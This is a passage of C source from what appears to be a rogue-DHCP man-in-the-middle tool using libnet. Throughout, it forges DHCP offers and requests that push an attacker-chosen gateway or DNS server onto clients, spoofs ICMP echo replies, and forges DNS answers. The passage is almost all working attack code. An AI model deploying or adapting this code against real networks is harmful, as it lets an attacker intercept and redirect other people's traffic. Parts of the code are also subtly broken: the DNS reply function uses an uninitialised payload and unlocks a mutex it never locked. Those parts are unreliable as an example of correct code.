		exit(1);
	}
	server = (u_char *)&p_curr->ipaddress;
	printf("server %d.%d.%d.%d\n", server[0], server[1], server[2], server[3]);

	
	
	p_curr = mtpoint;
	if(p_curr == NULL){
		printf("Opps: ll is empty\n");
		exit(1);
	}

	while((p_curr != NULL) && (p_curr->type != DNS)){
		p_curr = (PMT) p_curr->nextmt;
	}

	if(p_curr == NULL){
		printf("Opps: Couldn't find target in ll\n");
		exit(1);
	}
	dns = (u_char *)&p_curr->ipaddress;
	printf("dns %d.%d.%d.%d\n", dns[0], dns[1], dns[2], dns[3]);

	
	if(mitmsubnet){
		p_curr = mtpoint;
		if(p_curr == NULL){
			printf("Opps: ll is empty\n");
			exit(1);
		}

		while((p_curr != NULL) && (p_curr->type != GATEWAY)){
			p_curr = (PMT) p_curr->nextmt;
		}

		if(p_curr == NULL){
			printf("Opps: Couldn't find target in ll\n");
			exit(1);
		}
		gateway = (u_char *)&p_curr->ipaddress;
		printf("gateway %d.%d.%d.%d\n", gateway[0], gateway[1], gateway[2], gateway[3]);
	}
	else {
		printf("gateway %d.%d.%d.%d\n", gatewaya, gatewayb, gatewayc, gatewayd);
	}
	i = 0;
	options = malloc(61 * sizeof(unsigned char)); //orig size 33
	options[i++] = LIBNET_DHCP_MESSAGETYPE;
	options[i++] = 1;
	options[i++] = 0x02; //LIBNET_DHCP_OFFER;

	options[i++] = 0x36; //server identifier
	options[i++] = 0x04; //size
	options[i++] = (u_int8_t) server[0];
	options[i++] = (u_int8_t) server[1];
	options[i++] = (u_int8_t) server[2];
	options[i++] = (u_int8_t) server[3];
	
	options[i++] = 0x33; //lease time
	options[i++] = 0x04; //size
	options[i++] = 0x00;
	options[i++] = 0x00;
	options[i++] = 0xa8; //2 hours
	options[i++] = 0xc0;

	options[i++] = 0x01; //subnet mask
	options[i++] = 0x04; //size
	options[i++] = subneta; 
	options[i++] = subnetb;
	options[i++] = subnetc;
	options[i++] = subnetd;

	if(mitmsubnet){
		options[i++] = 0x03; //default router
		options[i++] = 0x04; //size
		options[i++] = (u_int8_t) gateway[0];
		options[i++] = (u_int8_t) gateway[1];
		options[i++] = (u_int8_t) gateway[2];
		options[i++] = (u_int8_t) gateway[3];
	}
	
	else if(mitmdns){
		options[i++] = 0x03; //default router
		options[i++] = 0x04; //size
		options[i++] = (u_int8_t) gatewaya;
		options[i++] = (u_int8_t) gatewayb;
		options[i++] = (u_int8_t) gatewayc;
		options[i++] = (u_int8_t) gatewayd;
	}

	else{
		printf("Opps: only subnet or dns allowed\n");
		exit(1);
	}
	
	options[i++] = 0x06; //DNS SERVER
	options[i++] = 0x04; //size
	options[i++] = dns[0];
	options[i++] = dns[1];
	options[i++] = dns[2];
	options[i++] = dns[3];
	options[i++] = LIBNET_DHCP_END;
	for(a=0;a<27;a++){
		options[i++] = 0x00;
	}
	
	options_len = i; //that should work :)
	if(v)printf("options_len = %ld\n", options_len);
	if(pthread_mutex_lock(&packetlock) != 0){
		printf("Opps: pthread_mutex_lock (dhcp request) error\n");
		exit(1);
	}
	
	tid = (u_char*)&dhcph->trans_id;
	printf("transid %.2x %.2x %.2x %.2x\n",tid[0], tid[1], tid[2], tid[3]);
	
	tracktran = dhcph->trans_id;
	
	dhcp = libnet_build_dhcpv4(
		LIBNET_DHCP_REPLY,
		1,
		6,
		0,
		ntohl(dhcph->trans_id),
		0,
		0x8000,
		0,
		convert32(target, 0, 1, 2, 3), //offered IP
		convert32(server, 0,1,2,3), //server ip
		0, //relay
		ether->ether_shost, //client mac
		NULL,
		NULL,
		options,
		options_len,
		l,
		0);
	if(dhcp == -1){
		printf("Opps: DHCP build error as %s\n", libnet_geterror(l));
	}

	udp = libnet_build_udp(
                 67,                     //source port
		 68,                     //dst port
		 LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, //packetsize
		 0,                      //checksum
		 NULL,                   //payload
		 0,                      //payload length
		 l,                      //libnet handle
		 0);                     //libnet id
	if(udp == -1){
		printf("Opps: Couldn't build udp packet as %s\n", libnet_geterror(l));
		exit(1);
	}

	ip = libnet_build_ipv4(
		LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, //length
		0x10,                   //tos
		0,                      //IP ID
		0,                      //IP Frag
		GOBTTL,                 //TTL
		IPPROTO_UDP,            //protocol
		0,                      //checksum
		ntohl(convert32(server,0,1,2,3)),	      //source ip 0.0.0.0
		-1,                     //inet_addr("255.255.255.255") //dest ip
		NULL,                   //payload
		0,                      //length of payload
		l,                      //libnet handle
		0);                     //libnet id
	if(ip == -1){
		printf("Opps: Couldn't build ip packet as %s\n", libnet_geterror(l));
		exit(1);
	}
			  
	t = libnet_build_ethernet(
		ether->ether_shost,               //enet_dst
		p_curr->srcmac,               //ethaddr.ether_addr_octet, //enet_src
		ETHERTYPE_IP,           //protocol type
		NULL,                   //payload
		0,                      //payload length
		l,                      //libnet handle
		0);                     //libnet id
	if(t == -1){
		printf("Opps: Couldn't build ethernet frame as %s\n", libnet_geterror(l));
		exit(1);
	}
					  
	if(libnet_write(l) == -1){
		printf("Opps: libnet_write error (dhcp request mitm) as %s\n", libnet_geterror(l));
		exit(1);
	}
	
	libnet_stats(l, &gs);
	libnet_clear_packet(l);
	free(options);
	if(pthread_mutex_unlock(&packetlock) != 0){
		printf("Opps: pthread_mutex_unlock (dhcp request) error\n");
		exit(1);
	}
	return(0);
}
		
int startDHCPrequest(u_int32_t transactionid)
{
	void addstats(struct libnet_stats);
	
	libnet_ptag_t t;
	libnet_ptag_t ip;
	libnet_ptag_t udp;
	libnet_ptag_t dhcp;
	u_char enet_src[6];
	u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
	int x, i;
	u_int32_t transid;
	u_char *options;
	u_long options_len;
	PMT p_curr, p_top;
	mtnode mt;
	unsigned char *ipa;
	
	
	if(pthread_mutex_lock(&listlock) != 0){
		printf("Opps: pthread_mutex_lock (dhcp request ll top) error\n");
		exit(1);
	}

	p_top = p_curr = mtpoint;
	//printf("Sending DHCP request\n");
	
	if(p_curr == NULL){
		//printf("ll is empty\n");
		if(pthread_mutex_unlock(&listlock) != 0){
			printf("Opps: pthread_mutex_unlock (dhcp request ll empty) error\n");
			exit(1);
		}
		return 0;
	}
	
	while((p_curr != NULL) && (p_curr->transid != transactionid)){
		//printf("no match in loop\n");
		p_curr = (PMT) p_curr->nextmt;
	}
		
	if(p_curr == NULL){
		//printf("no match found ack discarded\n");
		if(pthread_mutex_unlock(&listlock) != 0){
			printf("Opps: pthread_mutex_unlock (dhcp request ll no found) error\n");
			exit(1);
		}
		return 0;
	}
	else{
		//printf("transid for sniffer offer found in ll\n");
		for(x=0; x<6; x++){
			enet_src[x] = p_curr->srcmac[x];
		}

		transid = p_curr->transid;
		if(pthread_mutex_unlock(&listlock) != 0){
			printf("Opps: pthread_mutex_unlock (dhcp request ll finished) error\n");
			exit(1);
		}

			i = 0;
	
		options = malloc(16*sizeof(u_char));
		if(options == NULL){
			printf("Opps: malloc error with dhcp options\n");
			exit(1);
		}
		options[i++] = LIBNET_DHCP_MESSAGETYPE;
		options[i++] = 1;
		options[i++] = 0x03; //LIBNET_DHCP_REQUEST;

		options[i++] = 0x32; //Request IP
		options[i++] = 0x04; //size of ip address
		ipa = (unsigned char *)&(p_curr->ipaddress);
		options[i++] = (u_int8_t) ipa[0]; //offered ip address
		options[i++] = (u_int8_t) ipa[1];
		options[i++] = (u_int8_t) ipa[2];
		options[i++] = (u_int8_t) ipa[3];

		options[i++] = 0x36; //server ip identifier
		options[i++] = 0x04; //sizeof ip
		options[i++] = p_curr->serverip[0]; //offered ip address
		options[i++] = p_curr->serverip[1];
		options[i++] = p_curr->serverip[2];
		options[i++] = p_curr->serverip[3];
		options[i++] = LIBNET_DHCP_END;

		//printf("serverip = %d.%d.%d.%d\n", p_curr->serverip[0], p_curr->serverip[1], p_curr->serverip[2], p_curr->serverip[3]);

		options_len = i; //that should work :)
		if(pthread_mutex_lock(&packetlock) != 0){
			printf("Opps: pthread_mutex_lock (dhcp request) error\n");
			exit(1);
		}
		dhcp = libnet_build_dhcpv4(
			LIBNET_DHCP_REQUEST,
			1,
			6,
			0,
			transid,
			0,
			0x8000,
			0,
			0,
			0,
			0,
			enet_src,
			NULL,
			NULL,
			options,
			options_len,
			l,
			0);
		if(dhcp == -1){
			printf("Opps: DHCP build error as %s\n", libnet_geterror(l));
		}

		 udp = libnet_build_udp(
	                 68,                     //source port
			 67,                     //dst port
			 LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, //packetsize
			 0,                      //checksum
			 NULL,                   //payload
			 0,                      //payload length
			 l,                      //libnet handle
			 0);                     //libnet id
		if(udp == -1){
			printf("Opps: Couldn't build udp packet as %s\n", libnet_geterror(l));
			exit(1);
		}
  
        	ip = libnet_build_ipv4(
			LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, //length
			0x10,                   //tos
			0,                      //IP ID
			0,                      //IP Frag
			GOBTTL,                 //TTL
			IPPROTO_UDP,            //protocol
			0,                      //checksum
			0,                      //source ip 0.0.0.0
			-1,                     //inet_addr("255.255.255.255") //dest ip
			NULL,                   //payload
			0,                      //length of payload
			l,                      //libnet handle
			0);                     //libnet id
		if(ip == -1){
			printf("Opps: Couldn't build ip packet as %s\n", libnet_geterror(l));
			exit(1);
		}
				  
		t = libnet_build_ethernet(
			enet_dst,               //enet_dst
			enet_src,               //ethaddr.ether_addr_octet, //enet_src
			ETHERTYPE_IP,           //protocol type
			NULL,                   //payload
			0,                      //payload length
			l,                      //libnet handle
			0);                     //libnet id
		if(t == -1){
			printf("Opps: Couldn't build ethernet frame as %s\n", libnet_geterror(l));
			exit(1);
		}
						  
		if(libnet_write(l) == -1){
			printf("Opps: libnet_write error (dhcp request) as %s\n", libnet_geterror(l));
			exit(1);
		}
		
		free(options);
		libnet_stats(l, &gs);
		libnet_clear_packet(l);
		
		if(pthread_mutex_unlock(&packetlock) != 0){
			printf("Opps: pthread_mutex_unlock (dhcp request) error\n");
			exit(1);
		}
		mt.transid = transactionid;
		mt.dhcptype = REQUESTSENT;
		updatell(mt);
		//printf("send dhcp request\n");
		return(0);
	}
	return 0;

}

int startICMPECHOREPLY(void)
{
	PMT p_curr;
	Packet *tsd;
	struct my_icmpecho *iecho;
	struct my_ip *mip;
	struct ether_header *ether;
	libnet_ptag_t t;
	libnet_ptag_t ip;
	libnet_ptag_t icmp;
	u_char enet_src[6];
	u_char *payload;
	u_int payloadtsize;
	u_int psize;

	int c,a;
	payloadtsize = 0;
	psize = 0;
	
	if(dontreplytoping){
		printf("Don;t reply to ping.... returning\n");
		return(0);
	}

	if(v)printf("start ICMP echo reply\n\n");
	
		if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}
	
	ether = (struct ether_header *)tsd->pkt;
	mip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
iecho = (struct my_icmpecho *)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_icmp));
	payloadtsize -= (sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_icmp) + sizeof(struct my_icmpecho));
	payload = (u_char *)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_icmp) + sizeof(struct my_icmpecho)); 

	psize = tsd->caplen + payloadtsize;
	//printf("paytload size: %d caplen = %d = payload = %d\n", payloadtsize, tsd->caplen, psize);
	
	if(pthread_mutex_lock(&listlock) != 0){
		printf("Opps: pthread_mutex_lock (icmp reply ll) error\n");
		exit(1);
	}

	p_curr = mtpoint;
	
	if(p_curr == NULL){
		//printf("LL empty\n");
		if(pthread_mutex_unlock(&listlock) != 0){
			printf("Opps: pthread_mutex_unlock (icmp reply ll) error\n");
			exit(1);
		}
	return(0);
	}
	while((p_curr != NULL) && (p_curr->ipaddress != mip->ip_dst)){
		p_curr = (PMT) p_curr->nextmt;
	}
	if(p_curr == NULL){
		//printf("Not found in list\n");
		if(pthread_mutex_unlock(&listlock) != 0){
			printf("Opps: pthread_mutex_unlock (icmp reply ll) error\n");
			exit(1);
		}
		return(0);
	}
	else{
		//found
		for(a=0; a<6; a++){
			 enet_src[a] = p_curr->srcmac[a];
		}
		if(pthread_mutex_unlock(&listlock) != 0){
			printf("Opps: pthread_mutex_unlock (icmp reply ll) error\n");
			exit(1);
		}
		if(pthread_mutex_lock(&packetlock) != 0){
			printf("Opps: pthread_mutex_lock (icmp echo reply) error\n");
			exit(1);
		}

		icmp = libnet_build_icmpv4_echo(
				0,	//type reply
				0,	//code
				0,	//checksum
				iecho->id,
				iecho->seq,
				payload, 
				psize,	//payload size
				l,	//libnet handle
				0);
		if(icmp == -1){
			printf("Opps: libnet_build_icmpv4_echo error as %s\n",libnet_geterror(l));
			exit(0);
		}
		ip = libnet_build_ipv4(
				LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + psize,
				0,	//TOS
				0,	//id
				0,	//frag
				GOBTTL,	//TTL
				IPPROTO_ICMP, //proto
				0,
				mip->ip_dst, //ip src.....ip->ip_dst is the requests dst which is our src 
				mip->ip_src, //ip dst
				NULL,	//payload
				0,	//payload size
				l,	//libnet handle
				0);	//libnet ptag
		if(ip == -1){
			printf("Opps: libnet_build_ipv4 error as %s\n", libnet_geterror(l));
			exit(0);
		}

		t = libnet_build_ethernet(
				ether->ether_shost,	//DEST
				enet_src,		//src
				ETHERTYPE_IP,
				NULL,
				0,
				l,
				0);
		if(t == -1){
			printf("Opps: libnet_build_ethernet error as %s\n", libnet_geterror(l));
			exit(0);
		}	

		c = libnet_write(l);
		if(c == -1){
			printf("Opps: libnet_write error (icmp echo reply) as %s\n", libnet_geterror(l));
			exit(0);
		}
		printf("echo returned\n");	
		libnet_stats(l, &gs);
		libnet_clear_packet(l);
		if(pthread_mutex_unlock(&packetlock) != 0){
			printf("Opps: pthread_mutex_unlock (icmp echo reply) error\n");
			exit(1);
		}

	}
	
	return(0);
}

u_int8_t senddnsreply(void)
{
	Packet *tsd;
	libnet_ptag_t t;
	u_char *payload;
	u_int payloads;
	struct my_udp *udp;
	struct my_dnsquery *dns;
	struct my_ip *ip;
	struct ether_header *ether;
	int c;

	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}
	
	ether = (struct ether_header *)tsd->pkt;
	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	udp = (struct my_udp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip));
	dns = (struct my_dnsquery*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip) + sizeof(struct my_udp));

/*       libnet_build_dnsv4(u_short id, u_short flags, u_short num_q,
         u_short num_anws_rr, u_short num_auth_rr, u_short num_addi_rr,
         u_char *payload, u_long payload_s, libnet_t *l, libnet_ptag_t ptag);
*/

	t = libnet_build_dnsv4(
		(u_short)dns->dnsid, 	//id
		0,			//flags
		1,			//number of q's
		1,			//numter answers
		0,			//number of auth
		0,			//number of additional
		payload,			//payload
		payloads,		//payload size
		l,			//libnet handle
		0);			//linbet if
	if(t == -1){
                printf("Opps: libnet_build_dns error as %s\n\n", libnet_geterror(l));
                exit(1);
        }

        t = libnet_build_udp(
                udp->dst_port,        //src port
                udp->src_port,        //dst port
                LIBNET_UDP_H + LIBNET_DNSV4_H + payloads,        //length
                0,              //sum
                NULL,             //payload
                0,       //payload size
                l,              //libnet handle
                0);             //libnet if
        if(t == -1){
                printf("Opps: libnet_build_ipv4 error as %s\n\n", libnet_geterror(l));
                exit(1);
        }


	t = libnet_build_ipv4(
		LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DNSV4_H + payloads,
		0,	//TOS
		0,	//id
		0,	//frag
		GOBTTL,	//TTL
		IPPROTO_UDP, //proto
		0,
		ip->ip_dst, //ip src.....ip->ip_dst is the requests dst which is our src 
		ip->ip_src, //ip dst
		NULL,	//payload
		0,	//payload size
		l,	//libnet handle
		0);	//libnet ptag
	if(t == -1){
		printf("Opps: libnet_build_ipv4 error as %s\n", libnet_geterror(l));
		exit(0);
	}

	t = libnet_build_ethernet(
		ether->ether_shost,	//DEST
		ether->ether_dhost,	//src
		ETHERTYPE_IP,
		NULL,
		0,
		l,
		0);
	if(t == -1){
		printf("Opps: libnet_build_ethernet error as %s\n", libnet_geterror(l));
		exit(0);
	}	

	c = libnet_write(l);
	if(c == -1){
		printf("Opps: libnet_write error (dns reply) as %s\n", libnet_geterror(l));
		exit(0);
	}
	printf("dns reply returned\n");	
	libnet_stats(l, &gs);
	libnet_clear_packet(l);
	if(pthread_mutex_unlock(&packetlock) != 0){
		printf("Opps: pthread_mutex_unlock (dns reply) error\n");
		exit(1);
	}
	return(0);
}
